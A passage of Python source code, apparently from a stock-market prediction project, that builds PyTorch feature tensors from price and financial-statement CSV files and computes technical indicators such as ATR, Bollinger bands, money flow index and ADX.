np.empty((d0, d1, 5), dtype=np.float32); tensor_pri[:] = np.nan\n\n for sec_id in range(len(self.unique_secus)):\n\n sec = self.unique_secus[sec_id]\n sec_rows_prices = prices_csv[prices_csv[:,1] == sec]\n\n adj_factor = self.sto[-1,sec_id,2].item()\n\n if len(sec_rows_prices) > 0:\n\n tensor_pri[-1,sec_id,:] = sec_rows_prices[:,2:7]\n tensor_pri[-1,sec_id,:4] /= adj_factor\n tensor_pri[-1,sec_id,4] *= adj_factor\n\n #!!! keep this code block AFTER adj_factor is applied to prices and volume\n self.sto[:,sec_id,2] *= np.nan_to_num(sec_rows_prices[:,-3], nan=1).item() # adj_factor \n self.sto[:,sec_id,-3] = 1.*(sec_rows_prices[:,-2] > 0).item() # expected_dividend\n self.sto[:,sec_id,-2] = 1.*(sec_rows_prices[:,-1] ==1).item() # under_supervision\n self.sto[:,sec_id,-1] = 1 # is_active\n else:\n tensor_pri[-1,sec_id,:] = np.nan\n self.sto[:,sec_id,2] *= 1 \n self.sto[:,sec_id,-3:] = 0\n\n self.pri = torch.cat((self.pri, torch.from_numpy(tensor_pri).cuda()), dim=0)[-112:]\n\n ret, vol = self.get_ta_channels(self.pri)\n ret = ret[-1].unsqueeze(0)\n vol = vol[-1].unsqueeze(0)\n\n ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ###\n\n # financials_csv = financials_csv[[ 'Date', 'SecuritiesCode',\n # 'AverageNumberOfShares','EquityToAssetRatio','UpdateType',\n # 'NetSales','OperatingProfit','OrdinaryProfit','EarningsPerShare',\n # 'ForecastNetSales','ForecastOperatingProfit','ForecastOrdinaryProfit','ForecastEarningsPerShare']]\n\n financials_csv = self.process_financials_csv(financials_csv)\n financials_csv = financials_csv.to_numpy(np.float32)\n financials_csv = torch.from_numpy(financials_csv).cuda()\n\n # statements_last, forecasts_last, quaterly_updates, eq_to_asset, \n # days_since_last_update, days_since_last_annual_update, days_since_last_forecast, \n # profit_type, market_cap, is_year_update, is_forecast, update_types\n\n tensor_upd = torch.empty((d0, d1, 33), dtype=torch.float32, device=self.upd.device); tensor_upd[:] = np.nan\n\n # incrementar day counters; resettear update flags\n tensor_upd[:] = self.upd[-1].unsqueeze(0)\n tensor_upd[-1,:,-8:-5] += d0 # day counters\n tensor_upd[-1,:,-5] = 0 # profit_type\n tensor_upd[-1,:,-3:] = 0 # is_year_update, is_forecast, update_types\n\n close = self.pri[-1,:,3]\n\n # calcular diferencia entre self.fin y financials; copiar diferencia y num_days = 0; actualizar self.fin\n for i in range(len(financials_csv)):\n\n update = financials_csv[i]\n sec = update[1].item()\n\n if not sec in self.unique_secus:\n continue\n\n sec_id = np.argwhere(self.unique_secus==sec).item()\n num_of_shares = float(update[2])\n eq_to_asset = float(update[3])\n update_type = float(update[4])\n profit = float(update[7])\n market_cap = num_of_shares * close[sec_id]\n is_forecast = 0\n\n if math.isnan(eq_to_asset):\n eq_to_asset = tensor_upd[-1,sec_id,-9]\n\n if market_cap.isnan().item():\n market_cap = tensor_upd[-1,sec_id,-4]\n\n if (~update[9:13].isnan()).all():\n\n forecasts = update[9:13]\n forecasts[:3] /= market_cap\n forecasts[-1] /= close[sec_id]\n\n tensor_upd[-1,sec_id,-6] = 0\n tensor_upd[-1,sec_id,4:8] = forecasts\n\n is_forecast = 1\n\n if update_type > 0:\n\n statements = update[5:9]\n statements[:3] /= market_cap\n statements[-1] /= close[sec_id]\n\n profit_type = 0\n if profit > 0 and statements[2] < 0: profit_type = 1\n if profit < 0 and statements[2] > 0: profit_type = 2\n\n tensor_upd[-1,sec_id,-5] = profit_type\n tensor_upd[-1,sec_id,-8] = 0\n\n previous_values = tensor_upd[-1,sec_id,:24].clone()\n tensor_upd[-1,sec_id,:4] = statements\n\n if update_type == 1:\n tensor_upd[-1,sec_id,8:12] = statements\n elif update_type == 2:\n tensor_upd[-1,sec_id,12:16] = statements\n elif update_type == 3:\n tensor_upd[-1,sec_id,16:20] = statements\n elif update_type == 4:\n tensor_upd[-1,sec_id,20:24] = statements\n tensor_upd[-1,sec_id,-7] = 0\n\n tensor_upd[-1,sec_id,:24] = torch.nan_to_num(tensor_upd[-1,sec_id,:24]) + torch.isnan(tensor_upd[-1,sec_id,:24]) * previous_values\n\n tensor_upd[-1,sec_id,-9] = eq_to_asset\n tensor_upd[-1,sec_id,-4] = market_cap\n tensor_upd[-1,sec_id,-3] = 1. * (update_type==4)\n tensor_upd[-1,sec_id,-2] = is_forecast\n tensor_upd[-1,sec_id,-1] = update_type\n\n self.upd = tensor_upd[-1].unsqueeze(0)\n fin = self.get_fi_channels(tensor_upd)[-1].unsqueeze(0)\n\n fin[:,:,-8:-5] = transform_num_days(fin[:,:,-8:-5]) # days_since_last_update\n fin[:,:,-4] = 1. *(fin[:,:,-4] < 8e9) # is_illiquid\n\n update_types = F.one_hot(fin[:,:,-1].long(), num_classes=5)\n profit_types = F.one_hot(fin[:,:,-5].long(), num_classes=3)\n binary_feats = fin[:,:,-4:-1]\n\n fin = torch.cat(( ret[:,:,:8],\n vol[:,:,:8],\n fin),\n dim=-1)\n\n fin = self.pre_process_for_inference_feat(fin[:,:,:-5], 'por')\n\n vol_weights = - torch.clip(vol[:,:,3],0,0.05).unsqueeze(-1)\n fin = torch.cat((vol_weights, fin, profit_types, binary_feats, update_types), dim=-1)\n\n sto = self.pre_process_for_inference_sto(self.sto)\n ret = self.pre_process_for_inference_feat(ret, 'ret')\n vol = self.pre_process_for_inference_feat(vol, 'vol')\n\n return sto, ret, vol, fin\n\n def process_financials_csv(self, financials_csv):\n\n financials_csv = financials_csv[~financials_csv.TypeOfDocument.isna()]\n\n financials_csv['UpdateType'] = -1\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('1Q'), 'UpdateType'] = 1\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('2Q'), 'UpdateType'] = 2\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('3Q'), 'UpdateType'] = 3\n financials_csv.loc[financials_csv.TypeOfCurrentPeriod.str.startswith('FY'), 'UpdateType'] = 4\n financials_csv.loc[financials_csv.TypeOfDocument.str.startswith('Forecast'), 'UpdateType'] = 0\n financials_csv = financials_csv[financials_csv.UpdateType > -1]\n\n financials_csv = financials_csv[[ 'Date', 'SecuritiesCode',\n 'AverageNumberOfShares','EquityToAssetRatio','UpdateType',\n 'NetSales','OperatingProfit','OrdinaryProfit','EarningsPerShare',\n 'ForecastNetSales','ForecastOperatingProfit','ForecastOrdinaryProfit','ForecastEarningsPerShare']]\n financials_csv.Date = from_date_to_int(financials_csv.Date)\n financials_csv = financials_csv.replace('-',np.nan)\n\n return financials_csv\n\n def get_stock_info(self, sec):\n\n if not hasattr(self, 'stock_dico'):\n\n self.stock_dico = pd.read_csv(self.settings['ROOT_DIR'] + 'stock_list.csv')\n self.stock_dico = self.stock_dico.set_index('SecuritiesCode')\n\n try:\n segment_id = self.stock_dico.loc[sec]['NewMarketSegment']\n\n if segment_id.startswith('Prime'): segment_id = 1.\n elif segment_id.startswith('Standard'): segment_id = 2.\n elif segment_id.startswith('Growth'): segment_id = 3.\n else: segment_id = 0.\n except:\n segment_id = 0.\n\n try:\n # if self.use33SectorCode:\n # sector_id = float(self.stock_dico.loc[sec]['33SectorCode'])\n # else:\n sector_id = float(self.stock_dico.loc[sec]['17SectorCode'])\n except:\n sector_id = 0.\n\n try:\n index_id = float(self.stock_dico.loc[sec]['NewIndexSeriesSizeCode'])\n except:\n index_id = 0.\n\n return segment_id, sector_id, index_id\n\n def create_channel_files(self, secondary):\n\n filename = 'data_stocks_sec' if secondary else 'data_stocks'\n cached_stock_info_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created = os.path.exists(cached_stock_info_path)\n\n filename = 'data_targets_sec' if secondary else 'data_targets'\n cached_targets_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_targets_path)\n\n filename = 'data_returns_sec' if secondary else 'data_returns'\n cached_returns_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_returns_path)\n\n filename = 'data_volatility_sec' if secondary else 'data_volatility'\n cached_volatility_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_volatility_path)\n\n filename = 'data_finances_sec' if secondary else 'data_finances'\n cached_finances_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_finances_path)\n\n filename = 'last_prices_sec' if secondary else 'last_prices'\n cached_prices_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_prices_path)\n\n filename = 'last_updates_sec' if secondary else 'last_updates'\n cached_updates_path = self.settings['CACHE_DIR'] + filename + '.pt'\n files_already_created &= os.path.exists(cached_updates_path)\n\n if files_already_created:\n return\n\n print('reading prices csv file...')\n filename = 'secondary_stock_prices' if secondary else 'stock_prices'\n stock_prices_csv = pd.concat(( pd.read_csv(self.settings['DATA_DIR'] + filename + '.csv').iloc[:,1:],\n # pd.read_csv(self.settings['SUPP_DIR'] + filename + '.csv').iloc[:,1:] \n ))\n\n stock_prices_csv.Date = from_date_to_int(stock_prices_csv.Date)\n stock_prices_csv = stock_prices_csv.to_numpy(np.float32)\n\n print('reading financials csv file...')\n financials_csv = pd.concat((pd.read_csv(self.settings['DATA_DIR'] + 'financials.csv', low_memory=False),\n # pd.read_csv(self.settings['SUPP_DIR'] + 'financials.csv', low_memory=False),\n ))\n\n financials_csv = self.process_financials_csv(financials_csv)\n financials_csv = financials_csv.to_numpy(np.float32)\n\n unique_dates = np.unique(stock_prices_csv[:,0])\n unique_secus = np.unique(stock_prices_csv[:,1])\n min_date = min(unique_dates)\n\n # series tensor dims: day, security, channel\n d0 = int(max(unique_dates) - min(unique_dates)) + 1\n d1 = len(unique_secus)\n\n tensor_sto = np.empty((d0, d1, 9), dtype=np.float32); tensor_sto[:] = np.nan\n tensor_pri = np.empty((d0, d1, 5), dtype=np.float32); tensor_pri[:] = np.nan\n tensor_upd = np.empty((d0, d1, 11), dtype=np.float32); tensor_upd[:] = np.nan\n tensor_tar = np.empty((d0, d1, 2), dtype=np.float32); tensor_tar[:] = np.nan\n\n print('creating tensors from csv files...')\n for sec_idx in tqdm(range(len(unique_secus))):\n\n sec = unique_secus[sec_idx].item()\n\n sec_rows_prices = stock_prices_csv[stock_prices_csv[:,1] == sec]\n sec_rows_financials = financials_csv[financials_csv[:,1] == sec]\n\n days_prices = list(map(int,sec_rows_prices[:,0] - min_date))\n days_financials = list(map(int,sec_rows_financials[:,0] - min_date))\n\n segment_id, sector_id, index_id = self.get_stock_info(sec)\n\n tensor_sto[days_prices,sec_idx,:2] = sec_rows_prices[:,:2] # date, security_id\n tensor_sto[days_prices,sec_idx,2] = sec_rows_prices[:,7] # adjustment_factor\n tensor_sto[:,sec_idx,3] = segment_id\n tensor_sto[:,sec_idx,4] = sector_id\n tensor_sto[:,sec_idx,5] = index_id\n tensor_sto[days_prices,sec_idx,6] = 1.*(sec_rows_prices[:,-3] > 0) # expected_dividend\n tensor_sto[days_prices,sec_idx,7] = sec_rows_prices[:,-2] # under_supervision\n tensor_sto[days_prices,sec_idx,8] = 1 # is_active\n\n tensor_pri[days_prices,sec_idx,:] = sec_rows_prices[:,2:7] # prices, volume\n tensor_tar[days_prices,sec_idx,0] = sec_rows_prices[:,-1] # target\n tensor_upd[days_financials,sec_idx,:] = sec_rows_financials[:,2:] # num_of_shares, eq_to_asset, type of update, statement, forecasts\n\n # filling nans with 0s for expected_dividend, under_supervision and is_active\n tensor_sto[:,:,-3:] = np.nan_to_num(tensor_sto[:,:,-3:])\n # filling a few targets with missing values with 0\n tensor_tar = np.nan_to_num(tensor_tar)\n\n print('adjusting prices after share splits...')\n tensor_sto[:,:,2] = np.nan_to_num(tensor_sto[:,:,2], nan=1)\n tensor_sto[:,:,2] = np.cumprod(tensor_sto[:,:,2], axis=0)\n adj_factor = np.expand_dims(tensor_sto[:-1,:,2], axis=-1)\n tensor_pri[1:,:,:4] /= adj_factor # prices\n tensor_pri[1:,:,4:5] *= adj_factor # volume\n\n print('imputing prices and creating rolling channels...')\n tensor_pri = torch.from_numpy(tensor_pri).cuda()\n tensor_ret, tensor_vol = self.get_ta_channels(tensor_pri)\n torch.cuda.empty_cache()\n\n close = tensor_pri[:,:,3:4]\n tensor_upd = torch.from_numpy(tensor_upd).cuda()\n tensor_upd = self.get_report_updates(tensor_upd, close)\n print('processing updates and forecasts diffs...')\n tensor_fin = self.get_fi_channels(tensor_upd)\n torch.cuda.empty_cache()\n\n tensor_sto = torch.from_numpy(tensor_sto).cuda()\n tensor_tar = torch.from_numpy(tensor_tar).cuda()\n\n is_active = tensor_sto[:,:,-1]\n is_bank_holiday = (is_active==0).all(dim=-1)\n tensor_sto = tensor_sto[~is_bank_holiday]\n tensor_ret = tensor_ret[~is_bank_holiday]\n tensor_vol = tensor_vol[~is_bank_holiday]\n tensor_fin = tensor_fin[~is_bank_holiday]\n tensor_tar = tensor_tar[~is_bank_holiday]\n torch.cuda.empty_cache()\n\n missing_targets = tensor_tar[:,:,0].sum(dim=-1)==0\n tensor_sto = tensor_sto[~missing_targets]\n tensor_ret = tensor_ret[~missing_targets]\n tensor_vol = tensor_vol[~missing_targets]\n tensor_fin = tensor_fin[~missing_targets]\n tensor_tar = tensor_tar[~missing_targets]\n\n returns_windows = tensor_ret[:,:,0].unfold(0,5,1)\n return_stds = torch_nanstd(returns_windows, dim=-1).unsqueeze(-1)\n return_stds = extend(return_stds, len(tensor_ret))\n return_stds_future = torch.roll(return_stds,-4,0)\n return_stds_future[-4:] = np.nan\n return_stds_future[-5:] = impute(return_stds_future[-5:], backpass=False)\n tensor_tar[:,:,1] = return_stds_future.squeeze()\n\n print('saving tensor files...')\n torch.save(tensor_sto.detach().cpu(), cached_stock_info_path)\n torch.save(tensor_pri[-112:].detach().cpu(), cached_prices_path)\n torch.save(tensor_upd[-1].unsqueeze(0).detach().cpu(), cached_updates_path)\n torch.save(tensor_tar.detach().cpu(), cached_targets_path)\n torch.save(tensor_ret.detach().cpu(), cached_returns_path)\n torch.save(tensor_vol.detach().cpu(), cached_volatility_path)\n torch.save(tensor_fin.detach().cpu(), cached_finances_path)\n\n def get_report_updates(self, tensor_upd, close):\n\n # num_of_shares, eq_to_asset, type of update, statement (4), forecast (4)\n\n print('processing num_of_shares, eq_to_asset, market_cap...')\n tensor_upd[:,:,:2] = impute(tensor_upd[:,:,:2])\n num_of_shares = tensor_upd[:,:,0:1]\n num_of_shares = torch.nan_to_num(num_of_shares, nan=torch.nanmedian(num_of_shares))\n eq_to_asset = tensor_upd[:,:,1:2]\n eq_to_asset = torch.nan_to_num(eq_to_asset, nan=torch.nanmedian(eq_to_asset))\n market_cap = num_of_shares * impute(close)\n market_cap = torch.nan_to_num(market_cap, nan=torch.nanmedian(market_cap))\n\n print('processing profits...')\n statements = tensor_upd[:,:,3:7]\n statements[:,:,:3] /= market_cap\n statements[:,:,3:4] /= close\n statements_last = impute(statements)\n for i in range(4):\n statements_last[:,:,i] = impute_with_medians(statements_last[:,:,i])\n profit = statements_last[:,:,2:3]\n\n update_types = tensor_upd[:,:,2:3]\n is_forecast = 1. * ~update_types.isnan()\n update_types = torch.nan_to_num(update_types)\n is_year_update = 1. * (update_types == 4)\n\n quaterly_updates = []\n\n print('processing quaterly updates...')\n for update_type in range(1,5):\n\n quaterly_upd = torch.empty_like(update_types); quaterly_upd[:] = np.nan\n quaterly_upd[update_types==update_type] = 1.\n quaterly_upd = quaterly_upd * statements\n\n quaterly_upd = impute(quaterly_upd)\n\n for i in range(4):\n quaterly_upd[:,:,i] = impute_with_medians(quaterly_upd[:,:,i]) \n\n quaterly_updates.append(quaterly_upd)\n\n quaterly_updates = torch.cat(quaterly_updates, dim=-1)\n\n print('processing forecasts...')\n forecasts_last = tensor_upd[:,:,7:]\n forecasts_last[:,:,:3] /= market_cap\n forecasts_last[:,:,3:4] /= close\n forecasts_last = impute(forecasts_last)\n # Some securities don't provide forecast, we use the median of the market last forecast:\n for i in range(4):\n forecasts_last[:,:,i] = impute_with_medians(forecasts_last[:,:,i])\n\n days_since_last_update = torch.empty_like(update_types); days_since_last_update[:] = np.nan\n days_since_last_annual_update = torch.empty_like(update_types); days_since_last_annual_update[:] = np.nan\n days_since_last_forecast = torch.empty_like(update_types); days_since_last_forecast[:] = np.nan\n profit_type = torch.zeros_like(update_types)\n\n print('processing number of days since last update and profit types...')\n for day in range(len(update_types)):\n\n if day > 0:\n\n days_since_last_update[day] = days_since_last_update[day-1] + 1\n days_since_last_annual_update[day] = days_since_last_annual_update[day-1] + 1\n days_since_last_forecast[day] = days_since_last_forecast[day-1] + 1\n\n break_even = (profit[day-1] < 0) & (profit[day] > 0)\n going_south = (profit[day-1] > 0) & (profit[day] < 0)\n profit_type[day] = torch.where(break_even, torch.ones_like(profit_type[day]), torch.where(going_south, 2., 0.))\n\n days_since_last_update[day, update_types[day]>0] = 0\n days_since_last_annual_update[day, is_year_update[day]==1] = 0\n days_since_last_forecast[day, is_forecast[day]==1] = 0\n\n days_since_last_update = impute_with_medians(days_since_last_update)\n days_since_last_annual_update = impute_with_medians(days_since_last_annual_update)\n days_since_last_forecast = impute_with_medians(days_since_last_forecast)\n\n return torch.cat(( statements_last, forecasts_last, quaterly_updates, eq_to_asset, \n days_since_last_update, days_since_last_annual_update, days_since_last_forecast, \n profit_type, market_cap, is_year_update, is_forecast, update_types), dim=-1)\n\n def get_fi_channels(self, tensor_upd):\n\n updates = tensor_upd[:,:,4:]\n\n quaterly_upd = updates[:,:,4:20]\n annual_upd = updates[:,:,16:20].clone()\n forecasts = updates[:,:,:4]\n\n update_types = updates[:,:,-1].unsqueeze(-1)\n is_forecast = updates[:,:,-2].unsqueeze(-1)\n\n last_upd_type = torch.empty_like(update_types); last_upd_type[:] = np.nan\n last_upd_type[update_types>0] = update_types[update_types>0]\n last_upd_type = impute(last_upd_type)\n\n quaterly_diff = torch.diff(quaterly_upd, dim=0)\n quaterly_diff = extend(quaterly_diff, len(updates), blank=0)\n\n quaterly_diff[:,:,:4] = quaterly_diff[:,:,:4] * torch.where(update_types==1., 1., np.nan)\n quaterly_diff[:,:,4:8] = quaterly_diff[:,:,4:8] * torch.where(update_types==2., 1., np.nan)\n quaterly_diff[:,:,8:12] = quaterly_diff[:,:,8:12] * torch.where(update_types==3., 1., np.nan)\n quaterly_diff[:,:,12:] = quaterly_diff[:,:,12:] * torch.where(update_types==4., 1., np.nan)\n\n quaterly_diff = torch.nan_to_num(impute(quaterly_diff))\n\n quaterly_diff[:,:,12:] -= quaterly_diff[:,:,8:12]\n quaterly_diff[:,:,8:12] -= quaterly_diff[:,:,4:8]\n quaterly_diff[:,:,4:8] -= quaterly_diff[:,:,:4]\n\n quaterly_diff = quaterly_diff[:,:,:4] * (last_upd_type==1) + \\\n quaterly_diff[:,:,4:8] * (last_upd_type==2) + \\\n quaterly_diff[:,:,8:12] * (last_upd_type==3) + \\\n quaterly_diff[:,:,12:] * (last_upd_type==4)\n\n annual_diff = torch.diff(annual_upd, dim=0)\n annual_diff = extend(annual_diff, len(updates))\n annual_diff *= torch.where(update_types==4., 1., np.nan)\n annual_diff = torch.nan_to_num(impute(annual_diff))\n\n forecasts_diff = torch.diff(forecasts, dim=0)\n forecasts_diff = extend(forecasts_diff, len(updates))\n forecasts_diff *= torch.where(is_forecast==1., 1., np.nan)\n forecasts_diff = torch.nan_to_num(impute(forecasts_diff))\n\n forecasts_ann = torch.nan_to_num(forecasts - annual_upd)\n\n return torch.cat((quaterly_diff, annual_diff, forecasts_diff, forecasts_ann, updates[:,:,20:]), dim=-1)\n\n def get_ta_channels(self, tensor_pri):\n\n num_days = len(tensor_pri)\n\n tensor_ret = torch.empty((num_days, tensor_pri.shape[1], 43), dtype=torch.float32, device=tensor_pri.device); tensor_ret[:] = np.nan\n tensor_vol = torch.empty((num_days, tensor_pri.shape[1], 43), dtype=torch.float32, device=tensor_pri.device); tensor_vol[:] = np.nan\n\n open = tensor_pri[:,:,0:1]\n high = tensor_pri[:,:,1:2]\n low = tensor_pri[:,:,2:3]\n close = tensor_pri[:,:,3:4]\n volume = tensor_pri[:,:,4:5]\n\n prev_close = torch.roll(close,1,0)\n prev_close[0] = prev_close[1]\n\n prev_high = torch.roll(high,1,0)\n prev_high[0] = prev_high[1]\n\n prev_low = torch.roll(low,1,0)\n prev_low[0] = prev_low[1]\n\n exec_cap = volume * (high + low + close) / 3\n zeros = torch.zeros_like(exec_cap)\n\n returns = extend(torch.diff(torch.log(impute(close)), dim=0), num_days, blank=0)\n returns = torch.clip(returns, -0.2, 0.2)\n returns_prev = torch.roll(returns,1,0)\n returns_prev[0] = 0\n returns[close.isnan()] = np.nan\n returns_prev[close.isnan()] = np.nan\n tensor_ret[:,:,0] = returns.squeeze()\n tensor_ret[:,:,1] = returns_prev.squeeze()\n\n close_open_unbalance = close / open - 1\n close_open_unbalance = torch.clip(close_open_unbalance, -0.2, 0.2)\n tensor_ret[:,:,2] = close_open_unbalance.squeeze()\n\n returns_windows = returns.unfold(0,7,1)\n vol = torch_nanstd(returns_windows, dim=-1)\n vol = extend(vol, num_days)\n past_vol = torch.roll(vol,7,0)\n past_vol[:7] = np.nan\n vol_delta = vol - past_vol\n vol_delta = torch.nan_to_num(vol_delta, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,0] = vol_delta.squeeze()\n\n volume_growth = extend(torch.diff(torch.log(impute(volume)),dim=0), num_days, blank=0)\n volume_growth[volume.isnan()] = np.nan\n volume_growth = torch.clip(volume_growth, -3, 3)\n tensor_vol[:,:,1] = volume_growth.squeeze()\n\n high_low_unbalance = high / low - 1\n high_low_unbalance = torch.clip(high_low_unbalance, 0, 3)\n tensor_vol[:,:,2] = high_low_unbalance.squeeze()\n\n for f in range(4):\n\n window_size = 7 * 2**f\n\n # ROLLING\n\n returns_windows = returns.unfold(0,window_size,1)\n close_windows = close.unfold(0,window_size,1)\n high_windows = high.unfold(0,window_size,1)\n low_windows = low.unfold(0,window_size,1)\n volume_growth_windows = volume_growth.unfold(0,window_size,1)\n\n rolling_close_means = extend(torch_nanmean(close_windows,dim=-1), num_days)\n rolling_close_stds = extend(torch_nanstd(close_windows,dim=-1), num_days)\n rolling_close_max = extend(torch_nanmax(close_windows, dim=-1), num_days)\n rolling_high_max = extend(torch_nanmax(high_windows, dim=-1), num_days)\n rolling_low_min = extend(torch_nanmin(low_windows, dim=-1), num_days)\n\n # returns moving avg\n rolling_returns_means = torch_nanmean(returns_windows, dim=-1)\n rolling_returns_means = extend(rolling_returns_means, num_days)\n rolling_returns_means = torch.nan_to_num(rolling_returns_means, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+f] = rolling_returns_means.squeeze()\n\n # last x days max return\n rolling_returns_max = torch_nanmax(returns_windows, dim=-1)\n rolling_returns_max = extend(rolling_returns_max, num_days)\n rolling_returns_max = impute_with_medians(rolling_returns_max)\n tensor_ret[:,:,3+4+f] = rolling_returns_max.squeeze()\n\n # last x days volatility\n rolling_returns_stds = torch_nanstd(returns_windows, dim=-1)\n rolling_returns_stds = extend(rolling_returns_stds, num_days)\n rolling_returns_stds = impute_with_medians(rolling_returns_stds)\n tensor_vol[:,:,3+f] = rolling_returns_stds.squeeze()\n\n # last x days volume growth mean\n rolling_volume_growth_means = torch_nanmean(volume_growth_windows, dim=-1)\n rolling_volume_growth_means = extend(rolling_volume_growth_means, num_days)\n rolling_volume_growth_means = torch.clip(rolling_volume_growth_means, -1, 1)\n rolling_volume_growth_means = torch.nan_to_num(rolling_volume_growth_means, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+4+f] = rolling_volume_growth_means.squeeze()\n\n\n # VOLATILITY\n\n # Average True Range: https://www.investopedia.com/terms/a/atr.asp #Keltner Channel\n TR = torch.topk(torch.cat((high - low, torch.abs(high - prev_close), torch.abs(low - prev_close)), dim=-1), dim=-1, k=1)[0]\n TR_windows = TR.unfold(0,window_size,1)\n ATR = torch_nanmean(TR_windows, dim=-1)\n ATR = extend(ATR, num_days)\n deviation_ATR = (close - rolling_close_means) / ATR\n deviation_ATR = torch.clip(deviation_ATR, -10, 10)\n deviation_ATR = torch.nan_to_num(deviation_ATR, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+8+f] = deviation_ATR.squeeze()\n\n # Bollinger Band: https://www.investopedia.com/terms/b/bollingerbands.asp\n deviation_bollinger = (close - rolling_close_means) / rolling_close_stds\n deviation_bollinger = torch.clip(deviation_bollinger, -5, 5)\n deviation_bollinger = torch.nan_to_num(deviation_bollinger, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+12+f] = deviation_bollinger.squeeze()\n\n # Donchian Channels: https://www.investopedia.com/terms/d/donchianchannels.asp\n middle_channel = (rolling_high_max + rolling_low_min) / 2\n deviation_donchian = close / middle_channel - 1\n deviation_donchian = torch.clip(deviation_donchian, -5, 5)\n deviation_donchian = torch.nan_to_num(deviation_donchian, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+16+f] = deviation_donchian.squeeze()\n\n # Ulcer Index: https://www.investopedia.com/terms/u/ulcerindex.asp\n R = 100 * (close - rolling_close_max) / rolling_close_max\n R2_windows = torch.pow(R,2).unfold(0,window_size,1)\n ulcer_index = torch.sqrt(torch_nansum(R2_windows, dim=-1) / (~R2_windows.isnan()).sum(dim=-1))\n ulcer_index = torch.clip(ulcer_index, 0, 50)\n ulcer_index = impute_with_medians(extend(ulcer_index, num_days))\n tensor_vol[:,:,3+20+f] = ulcer_index.squeeze()\n\n\n # VOLUME\n\n # Money Flow Index: https://www.investopedia.com/terms/m/mfi.asp\n exec_cap_pos_windows = torch.where(returns > 0, exec_cap, zeros).unfold(0,window_size,1)\n exec_cap_neg_windows = torch.where(returns < 0, exec_cap, zeros).unfold(0,window_size,1)\n money_flow_pos = torch_nansum(exec_cap_pos_windows, dim=-1)\n money_flow_neg = torch_nansum(exec_cap_neg_windows, dim=-1)\n MFI = money_flow_pos / (money_flow_pos + money_flow_neg) - 0.5\n MFI = torch.nan_to_num(extend(MFI, num_days), nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+24+f] = MFI.squeeze()\n\n # Chaikin Oscillator: https://www.investopedia.com/terms/c/chaikinoscillator.asp #Accumulation/Distribution Indicator\n mfv = volume * ((close - low) - (high - close)) / (high - low)\n mfv_slow = torch_nanmean(mfv.unfold(0,window_size,1), dim=-1)\n CO = mfv / extend(mfv_slow, num_days) - 1\n CO = torch.clip(CO, -100, 100)\n CO = torch.nan_to_num(CO, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+28+f] = CO.squeeze()\n\n # On-Balance Volume: https://www.investopedia.com/terms/o/onbalancevolume.asp\n obv = torch.where(returns > 0, volume, zeros) - torch.where(returns < 0, volume, zeros)\n obv_slow = torch_nanmean(obv.unfold(0,window_size,1), dim=-1)\n OBV = obv / extend(obv_slow, num_days) - 1\n OBV = torch.clip(OBV, -100, 100)\n OBV = torch.nan_to_num(OBV, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+32+f] = OBV.squeeze()\n\n # Force Index: https://www.investopedia.com/terms/f/force-index.asp\n fi = volume * (close - prev_close)\n fi_slow = torch_nanmean(fi.unfold(0,window_size,1), dim=-1)\n FI = fi / extend(fi_slow, num_days) - 1\n FI = torch.clip(FI, -100, 100)\n FI = torch.nan_to_num(FI, nan=0, posinf=0, neginf=0)\n tensor_vol[:,:,3+36+f] = FI.squeeze()\n\n\n # TREND\n\n # Average Directional Index: https://www.investopedia.com/terms/a/adx.asp\n dm_pos = high - prev_high\n dm_neg = prev_low - low\n smooth_dm_pos = torch_nanmean(dm_pos.unfold(0,window_size,1), dim=-1)\n smooth_dm_neg = torch_nanmean(dm_neg.unfold(0,window_size,1), dim=-1)\n di_pos = extend(smooth_dm_pos, num_days) / ATR\n di_neg = extend(smooth_dm_neg, num_days) / ATR\n DX = (di_pos - di_neg) / (di_pos + di_neg)\n DX_windows = DX.unfold(0,window_size,1)\n ADX = torch_nanmean(DX_windows, dim=-1)\n ADX = extend(ADX, num_days)\n ADX = torch.clip(ADX, -100, 100)\n ADX = torch.nan_to_num(ADX, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+8+f] = ADX.squeeze()\n\n # Vortex Indicator: https://www.investopedia.com/terms/v/vortex-indicator-vi.asp\n vm_pos = torch.abs(high - prev_low)\n vm_neg = torch.abs(low - prev_high)\n sum_vm_pos = torch_nansum(vm_pos.unfold(0,window_size,1), dim=-1)\n sum_vm_neg = torch_nansum(vm_neg.unfold(0,window_size,1), dim=-1)\n VI = sum_vm_pos / sum_vm_neg - 1\n VI = extend(VI, num_days)\n VI = torch.clip(VI, -1, 5)\n VI = torch.nan_to_num(VI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+12+f] = VI.squeeze()\n\n # Mass Index: https://www.investopedia.com/terms/m/mass-index.asp\n high_low_diff = high - low\n high_low_diff_slow = torch_nanmean(high_low_diff.unfold(0,window_size,1), dim=-1)\n high_low_diff_fast = torch_nanmean(high_low_diff.unfold(0,window_size//3,1), dim=-1)\n MI = extend(high_low_diff_fast, num_days) / extend(high_low_diff_slow, num_days) - 1\n MI = extend(MI, num_days)\n MI = torch.clip(MI, -1, 1.5)\n MI = torch.nan_to_num(MI, nan=0, posinf=0, neginf=0)\n tensor_ret[:,:,3+16+f] = MI.squeeze()\n\n\n # MOMENTUM\n\n # Relative Strength Index: https://www.investopedia.com/terms/r/rsi.asp\n returns_pos_windows = torch.where(returns > 0, returns, 